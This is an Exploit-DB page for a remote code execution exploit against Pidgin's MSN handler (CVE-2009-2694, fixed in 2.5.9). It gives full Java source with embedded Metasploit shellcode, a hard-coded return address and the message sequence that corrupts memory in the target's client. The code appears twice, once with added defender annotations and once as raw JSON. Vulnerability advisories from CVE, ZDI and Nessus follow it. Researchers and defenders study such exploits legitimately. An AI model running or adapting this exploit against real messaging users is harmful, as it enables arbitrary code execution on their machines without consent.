ID EDB-ID:9615 Type exploitdb Reporter Pierre Nogues Modified 2009-09-09T00:00:00
Description
Pidgin MSN <= 2.5.8 Remote Code Execution Exploit. CVE-2009-1376,CVE-2009-2694. Remote exploit for windows platform
/*
* Pidgin MSN <= 2.5.8 Remote Code Execution
*
* Pierre Nogues - pierz@hotmail.it
* http://www.indahax.com/
*
*
* Description:
* Pidgin is a multi-protocol Instant Messenger.
*
* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].
* The "libmsn" library used by Pidgin does not correctly handle specially crafted MsnSlp
* packets, which can lead to memory corruption.
*
* Affected versions :
* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.
*
* Platforms :
* Windows, Linux, Mac
*
* Fix :
* Fixed in Pidgin 2.5.9
* Update to the latest version : http://www.pidgin.im/download/
*
* References :
* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write
* [3] http://www.pidgin.im/news/security/?id=34
*
* Usage :
* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/
* javac.exe -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit.java
* java -cp "%classpath%;.\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL
*
*/
import net.sf.jml.*;
import net.sf.jml.event.*;
import net.sf.jml.impl.*;
import net.sf.jml.message.p2p.*;
import net.sf.jml.util.*;
/**
 * Proof-of-concept MSN client for the libmsn MsnSlp memory-corruption flaw that the
 * file header attributes to Pidgin <= 2.5.8 (CVE-2009-2694) and reports as fixed in 2.5.9.
 *
 * Flow, as written: log in through the JML library, open a switchboard, invite the
 * target when that switchboard starts, send one MsnP2PSlpMessage with flag 0x1000020
 * when a contact joins, then answer an incoming P2P message with one MsnP2PDataMessage
 * that carries the payload.
 *
 * Review notes for defenders:
 * - The overwrite location is one hard-coded stack address that the author recorded for
 *   a single build (XP SP3-FR, Pidgin 2.5.8); the payload is a calc.exe demonstration.
 * - The first message declares a total and current length of reteip + 4 without any
 *   body being set in this code, and the second passes neweip as its third constructor
 *   argument (presumably the offset field; confirm against JML). Length and offset
 *   values that far exceed the data actually transferred are the anomaly a receiver or
 *   a protocol monitor can bounds-check.
 * - Remediation per the file header: upgrade to Pidgin 2.5.9 or later.
 */
public class PidginExploit {
// JML session handle; assigned in start().
private MsnMessenger messenger;
// Sender account, sender password and target contact, taken from the command line.
private String login;
private String password;
private String target;
// Random P2P session id, reused by both messages this class sends.
private int session_id = NumberUtils.getIntRandom();
// Demonstration payload: a 6-byte stack adjustment followed by the 121-byte block below.
private byte shellcode[] = new byte[] {
/*
* if you use the stack in your shellcode do not forget to change esp because eip == esp == kaboom !
* sub esp,500
*/
(byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,
/*
* windows/exec - 121 bytes
* http://www.metasploit.com
* EXITFUNC=process, CMD=calc.exe
*/
(byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,
(byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,
(byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,
(byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,
(byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,
(byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,
(byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,
(byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,
(byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,
(byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,
(byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,
(byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,
(byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,
(byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,
(byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,
(byte) 0x00
};
// reteip = pointer to the return address in the stack
// The shellcode will be written just before reteip
// and reteip will automatically point to the shellcode. It's magic !
// NOTE(review): a fixed stack address, valid only for the one build named on the next line.
private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8
// Set in the constructor to reteip - shellcode.length.
private int neweip;
// shellcode followed by four trailing bytes that the constructor fills with neweip.
private byte[] payload = new byte[shellcode.length + 4];
// Length declared in the first message: everything up to and including the 4 bytes at reteip.
private int totallength = reteip + 4;
/**
 * Command-line entry point. Expects exactly three arguments (sender e-mail, sender
 * password, target e-mail); with any other count it prints the usage line and returns.
 */
public static void main(String[] args) throws Exception {
if(args.length != 3){
System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");
}else{
PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);
exploit.start();
}
}
/**
 * Stores the credentials and target, then assembles the payload buffer:
 * the shellcode bytes followed by neweip encoded least-significant byte first.
 *
 * @param login    sender MSN account
 * @param password sender account password
 * @param target   MSN e-mail address of the contact to invite
 */
public PidginExploit(String login, String password, String target){
this.login = login;
this.password = password;
this.target = target;
neweip = reteip - shellcode.length ;
for(int i=0;i<shellcode.length;i++)
payload[i] = shellcode[i];
// Little-endian encoding of neweip. The cast to byte keeps only the low 8 bits,
// so the signed >> on the top byte cannot leak sign-extension bits into the result.
payload[shellcode.length] = (byte)(neweip & 0x000000FF);
payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);
payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);
payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);
}
/**
 * Creates the JML messenger for the stored account, sets its initial status to ONLINE,
 * turns off incoming and outgoing logging, registers the listeners and starts the login.
 */
public void start() {
messenger = MsnMessengerFactory.createMsnMessenger(login,password);
messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);
messenger.setLogIncoming(false);
messenger.setLogOutgoing(false);
initMessenger(messenger);
messenger.login();
}
/**
 * Registers three listeners on the messenger: a contact-list listener that drives the
 * switchboard and the first message, a message listener that sends the second message,
 * and a messenger listener that only prints login, logout and exception events.
 *
 * @param messenger the JML messenger to attach the listeners to
 */
protected void initMessenger(MsnMessenger messenger) {
messenger.addContactListListener(new MsnContactListAdapter() {
// Once the contact list is initialised, request a new switchboard tagged with a private token.
public void contactListInitCompleted(MsnMessenger messenger) {
// Unique token; the callbacks compare it by identity to pick out the switchboard requested below.
final Object id = new Object();
messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {
// Invites the target into the switchboard this class requested; other switchboards are ignored.
public void switchboardStarted(MsnSwitchboard switchboard) {
if (id != switchboard.getAttachment())
return;
switchboard.inviteContact(Email.parseStr(target));
}
// Sends the first message when a contact joins the requested switchboard.
// NOTE(review): the joining contact is not compared with target in this code.
public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
if (id != switchboard.getAttachment())
return;
MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
msg.setIdentifier(NumberUtils.getIntRandom());
msg.setSessionId(session_id);
msg.setOffset(0);
// Total and current length are both declared as reteip + 4; no body is set on msg here.
msg.setTotalLength(totallength);
msg.setCurrentLength(totallength);
// This flag creates a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null
// We'll use this buffer to rewrite memory in the stack
msg.setFlag(0x1000020);
msg.setP2PDest(target);
switchboard.sendMessage(msg);
System.out.println("First packet sent, waiting for the ACK");
}
// Prints the event and unregisters this listener from the switchboard's messenger.
public void switchboardClosed(MsnSwitchboard switchboard) {
System.out.println("switchboardClosed");
switchboard.getMessenger().removeSwitchboardListener(this);
}
// Prints the event only.
public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){
System.out.println("contactLeaveSwitchboard");
}
});
messenger.newSwitchboard(id);
}
});
messenger.addMessageListener(new MsnMessageAdapter(){
// Called for an incoming P2P message; the code treats it as the ACK of the first
// message without inspecting its contents, and replies with the payload message.
public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {
//We receive the ACK of our first packet with the ID of the new bogus packet
// The return value of this call is discarded; the identifier is read again below.
message.getIdentifier();
// Third argument is neweip (presumably the offset field; confirm against JML),
// followed by the payload length, the payload bytes and the destination.
MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,
payload.length, payload, target);
switchboard.sendMessage(msg);
System.out.println("ACK received && Payload sent !");
// Printed unconditionally after the send; nothing here confirms any effect on the receiver.
System.out.println("Exploit OK ! CTRL+C to quit");
}
});
messenger.addMessengerListener(new MsnMessengerAdapter() {
// Status output only: prints the owner's e-mail on login and on logout.
public void loginCompleted(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " login");
}
public void logout(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " logout");
}
// Prints the throwable; there is no retry or shutdown handling.
public void exceptionCaught(MsnMessenger messenger,
Throwable throwable) {
System.out.println("caught exception: " + throwable);
}
});
}
}
// milw0rm.com [2009-09-09]
{"published": "2009-09-09T00:00:00", "id": "EDB-ID:9615", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "a3cd763b4f635d42ae04b9db43518ab098599e5d95e579edce9de746183f3049", "description": "Pidgin MSN <= 2.5.8 Remote Code Execution Exploit. CVE-2009-1376,CVE-2009-2694. Remote exploit for windows platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/9615/", "lastseen": "2016-02-01T10:59:54", "edition": 1, "title": "Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit", "osvdbidlist": ["54647"], "modified": "2009-09-09T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1376", "CVE-2009-2694"], "sourceHref": "https://www.exploit-db.com/download/9615/", "references": [], "reporter": "Pierre Nogues", "sourceData": "/*\n* Pidgin MSN <= 2.5.8 Remote Code Execution\n*\n* Pierre Nogues - pierz@hotmail.it\n* http://www.indahax.com/\n*\n*\n* Description:\n* Pidgin is a multi-protocol Instant Messenger.\n*\n* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].\n* The library \"libmsn\" used by pidgin doesn't handle specially crafted MsnSlp packets\n* which could lead to memory corruption.\n*\n* Affected versions :\n* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.\n*\n* Plateforms :\n* Windows, Linux, Mac\n*\n* Fix :\n* Fixed in Pidgin 2.5.9\n* Update to the latest version : http://www.pidgin.im/download/\n*\n* References :\n* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\n* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write\n* [3] http://www.pidgin.im/news/security/?id=34\n*\n* Usage :\n* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/\n* javac.exe -cp \"%classpath%;.\\jml-1.0b3-full.jar\" PidginExploit.java\n* java -cp \"%classpath%;.\\jml-1.0b3-full.jar\" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD 
TARGET_MSN_EMAIL\n*\n*/\n\nimport net.sf.jml.*;\nimport net.sf.jml.event.*;\nimport net.sf.jml.impl.*;\nimport net.sf.jml.message.p2p.*;\nimport net.sf.jml.util.*;\n\npublic class PidginExploit {\n\n private MsnMessenger messenger;\n private String login;\n private String password;\n private String target;\n\n private int session_id = NumberUtils.getIntRandom();\n\n private byte shellcode[] = new byte[] {\n\n /*\n * if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !\n * sub esp,500\n */\n (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,\n\n\n /*\n * windows/exec - 121 bytes\n * http://www.metasploit.com\n * EXITFUNC=process, CMD=calc.exe\n */\n (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,\n (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,\n (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,\n (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,\n (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,\n (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,\n (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,\n (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,\n (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,\n (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,\n (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,\n (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 
0x83,\n (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,\n (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,\n (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,\n (byte) 0x00\n };\n\n // reteip = pointer to the return address in the stack\n // The shellcode will be wrote just before reteip\n // and reteip will automaticly point to the shellcode. It's magic !\n private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8\n\n private int neweip;\n private byte[] payload = new byte[shellcode.length + 4];\n private int totallength = reteip + 4;\n\n public static void main(String[] args) throws Exception {\n\n if(args.length != 3){\n System.out.println(\"PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL\");\n }else{\n PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);\n exploit.start();\n }\n\n }\n\n public PidginExploit(String login, String password, String target){\n this.login = login;\n this.password = password;\n this.target = target;\n\n neweip = reteip - shellcode.length ;\n\n for(int i=0;i<shellcode.length;i++)\n payload[i] = shellcode[i];\n\n payload[shellcode.length] = (byte)(neweip & 0x000000FF);\n payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);\n payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);\n payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);\n }\n\n public void start() {\n messenger = MsnMessengerFactory.createMsnMessenger(login,password);\n messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);\n\n messenger.setLogIncoming(false);\n messenger.setLogOutgoing(false);\n\n initMessenger(messenger);\n messenger.login();\n }\n\n protected void initMessenger(MsnMessenger messenger) {\n\n messenger.addContactListListener(new MsnContactListAdapter() {\n\n public void contactListInitCompleted(MsnMessenger 
messenger) {\n\n final Object id = new Object();\n\n messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {\n\n public void switchboardStarted(MsnSwitchboard switchboard) {\n\n if (id != switchboard.getAttachment())\n return;\n\n switchboard.inviteContact(Email.parseStr(target));\n }\n\n public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {\n if (id != switchboard.getAttachment())\n return;\n\n MsnP2PSlpMessage msg = new MsnP2PSlpMessage();\n msg.setIdentifier(NumberUtils.getIntRandom());\n msg.setSessionId(session_id);\n msg.setOffset(0);\n msg.setTotalLength(totallength);\n msg.setCurrentLength(totallength);\n\n // This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null\n // We'll use this buffer to rewrite memory in the stack\n msg.setFlag(0x1000020);\n\n msg.setP2PDest(target);\n\n switchboard.sendMessage(msg);\n\n System.out.println(\"First packet sent, waiting for the ACK\");\n\n }\n\n public void switchboardClosed(MsnSwitchboard switchboard) {\n System.out.println(\"switchboardClosed\");\n switchboard.getMessenger().removeSwitchboardListener(this);\n }\n\n public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){\n System.out.println(\"contactLeaveSwitchboard\");\n }\n });\n messenger.newSwitchboard(id);\n }\n });\n\n messenger.addMessageListener(new MsnMessageAdapter(){\n\n public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {\n\n //We receive the ACK of our first packet with the ID of the new bogus packet\n message.getIdentifier();\n\n MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,\n payload.length, payload, target);\n\n switchboard.sendMessage(msg);\n System.out.println(\"ACK received && Payload sent !\");\n System.out.println(\"Exploit OK ! 
CTRL+C to quit\");\n\n }\n });\n\n\n\n messenger.addMessengerListener(new MsnMessengerAdapter() {\n\n public void loginCompleted(MsnMessenger messenger) {\n System.out.println(messenger.getOwner().getEmail() + \" login\");\n }\n\n public void logout(MsnMessenger messenger) {\n System.out.println(messenger.getOwner().getEmail() + \" logout\");\n }\n\n public void exceptionCaught(MsnMessenger messenger,\n Throwable throwable) {\n System.out.println(\"caught exception: \" + throwable);\n }\n });\n\n }\n}\n\n// milw0rm.com [2009-09-09]\n", "objectVersion": "1.0"}
{"result": {"cve": [{"id": "CVE-2009-1376", "type": "cve", "title": "CVE-2009-1376", "description": "Multiple integer overflows in the msn_slplink_process_msg functions in the MSN protocol handler in (1) libpurple/protocols/msn/slplink.c and (2) libpurple/protocols/msnp9/slplink.c in Pidgin (formerly Gaim) before 2.5.6 on 32-bit platforms allow remote attackers to execute arbitrary code via a malformed SLP message with a crafted offset value, leading to buffer overflows. NOTE: this issue exists because of an incomplete fix for CVE-2008-2927.", "published": "2009-05-26T11:30:05", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1376", "cvelist": ["CVE-2009-1376"], "lastseen": "2017-09-29T14:26:35"}, {"id": "CVE-2009-2694", "type": "cve", "title": "CVE-2009-2694", "description": "The msn_slplink_process_msg function in libpurple/protocols/msn/slplink.c in libpurple, as used in Pidgin (formerly Gaim) before 2.5.9 and Adium 1.3.5 and earlier, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) by sending multiple crafted SLP (aka MSNSLP) messages to trigger an overwrite of an arbitrary memory location. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2009-1376.", "published": "2009-08-21T07:02:41", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2694", "cvelist": ["CVE-2009-2694"], "lastseen": "2017-09-19T13:36:35"}], "zdi": [{"id": "ZDI-09-031", "type": "zdi", "title": "Multiple Vendor libpurple MSN Protocol SLP Message Heap Overflow Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on systems with vulnerable installations of messaging applications that make use of the libpurple library. 
User interaction is not required to exploit this vulnerability.\n\nThe specific flaw exists in the implementation of the MSN protocol, specifically the handling of SLP messages. The function msn_slplink_process_msg() fails to properly validate an offset value specified in the SLP packet. By providing a specific value, an attacker can overflow a heap buffer resulting in arbitrary code execution.", "published": "2009-06-08T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.zerodayinitiative.com/advisories/ZDI-09-031", "cvelist": ["CVE-2009-1376"], "lastseen": "2016-11-09T00:18:07"}], "nessus": [{"id": "UBUNTU_USN-781-2.NASL", "type": "nessus", "title": "Ubuntu 6.06 LTS : gaim vulnerabilities (USN-781-2)", "description": "It was discovered that Gaim did not properly handle certain malformed messages when sending a file using the XMPP protocol handler. If a user were tricked into sending a file, a remote attacker could send a specially crafted response and cause Gaim to crash, or possibly execute arbitrary code with user privileges. (CVE-2009-1373)\n\nIt was discovered that Gaim did not properly handle certain malformed messages in the MSN protocol handler. A remote attacker could send a specially crafted message and possibly execute arbitrary code with user privileges. (CVE-2009-1376).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2009-06-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=39313", "cvelist": ["CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2017-10-29T13:43:06"}, {"id": "DEBIAN_DSA-1805.NASL", "type": "nessus", "title": "Debian DSA-1805-1 : pidgin - several vulnerabilities", "description": "Several vulnerabilities have been discovered in Pidgin, a graphical multi-protocol instant messaging client. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2009-1373 A buffer overflow in the Jabber file transfer code may lead to denial of service or the execution of arbitrary code.\n\n - CVE-2009-1375 Memory corruption in an internal library may lead to denial of service.\n\n - CVE-2009-1376 The patch provided for the security issue tracked as CVE-2008-2927 - integer overflows in the MSN protocol handler - was found to be incomplete.\n\nThe old stable distribution (etch) is affected under the source package name gaim. However, due to build problems the updated packages couldn't be released along with the stable version. 
It will be released once the build problem is resolved.", "published": "2009-05-24T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=38878", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1373"], "lastseen": "2017-10-29T13:43:51"}, {"id": "ORACLELINUX_ELSA-2009-1059.NASL", "type": "nessus", "title": "Oracle Linux 3 : pidgin (ELSA-2009-1059)", "description": "From Red Hat Security Advisory 2009:1059 :\n\nAn updated pidgin package that fixes two security issues is now available for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple accounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers when using the Extensible Messaging and Presence Protocol (XMPP). If a Pidgin client initiates a file transfer, and the remote target sends a malformed response, it could cause Pidgin to crash or, potentially, execute arbitrary code with the permissions of the user running Pidgin. This flaw only affects accounts using XMPP, such as Jabber and Google Talk. (CVE-2009-1373)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory RHSA-2008:0584 provided an incomplete fix for the integer overflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin client receives a specially crafted MSN message, it may be possible to execute arbitrary code with the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list can send you messages. This prevents arbitrary MSN users from exploiting this flaw.\n\nAll Pidgin users should upgrade to this update package, which contains backported patches to resolve these issues. 
Pidgin must be restarted for this update to take effect.", "published": "2013-07-12T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=67862", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2017-10-29T13:33:51"}, {"id": "SUSE_GAIM-6350.NASL", "type": "nessus", "title": "SuSE 10 Security Update : gaim (ZYPP Patch Number 6350)", "description": "- malformed responses to file transfers could cause a buffer overflow in pidgin. (CVE-2009-1373)\n\n - the fix against integer overflows in the msn protocol handling was incomplete. (CVE-2009-1376)\n\n - certain ICQ message types could crash pidgin.\n (CVE-2009-1889)", "published": "2011-01-27T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=51744", "cvelist": ["CVE-2009-1376", "CVE-2009-1889", "CVE-2009-1373"], "lastseen": "2017-10-29T13:40:59"}, {"id": "REDHAT-RHSA-2009-1059.NASL", "type": "nessus", "title": "RHEL 3 : pidgin (RHSA-2009:1059)", "description": "An updated pidgin package that fixes two security issues is now available for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple accounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers when using the Extensible Messaging and Presence Protocol (XMPP). If a Pidgin client initiates a file transfer, and the remote target sends a malformed response, it could cause Pidgin to crash or, potentially, execute arbitrary code with the permissions of the user running Pidgin. This flaw only affects accounts using XMPP, such as Jabber and Google Talk. 
(CVE-2009-1373)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory RHSA-2008:0584 provided an incomplete fix for the integer overflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin client receives a specially crafted MSN message, it may be possible to execute arbitrary code with the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list can send you messages. This prevents arbitrary MSN users from exploiting this flaw.\n\nAll Pidgin users should upgrade to this update package, which contains backported patches to resolve these issues. Pidgin must be restarted for this update to take effect.", "published": "2009-05-23T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=38871", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2017-10-29T13:32:51"}, {"id": "CENTOS_RHSA-2009-1059.NASL", "type": "nessus", "title": "CentOS 3 : pidgin (CESA-2009:1059)", "description": "An updated pidgin package that fixes two security issues is now available for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple accounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers when using the Extensible Messaging and Presence Protocol (XMPP). If a Pidgin client initiates a file transfer, and the remote target sends a malformed response, it could cause Pidgin to crash or, potentially, execute arbitrary code with the permissions of the user running Pidgin. This flaw only affects accounts using XMPP, such as Jabber and Google Talk. 
(CVE-2009-1373)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory RHSA-2008:0584 provided an incomplete fix for the integer overflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin client receives a specially crafted MSN message, it may be possible to execute arbitrary code with the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list can send you messages. This prevents arbitrary MSN users from exploiting this flaw.\n\nAll Pidgin users should upgrade to this update package, which contains backported patches to resolve these issues. Pidgin must be restarted for this update to take effect.", "published": "2009-05-23T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=38868", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2017-10-29T13:33:43"}, {"id": "PIDGIN_2_5_6.NASL", "type": "nessus", "title": "Pidgin < 2.5.6 Multiple Buffer Overflows", "description": "The remote host is running Pidgin earlier than 2.5.6. Such versions are reportedly affected by multiple buffer overflow vulnerabilities :\n\n - A buffer overflow is possible when initiating a file transfer to a malicious buddy over XMPP. 
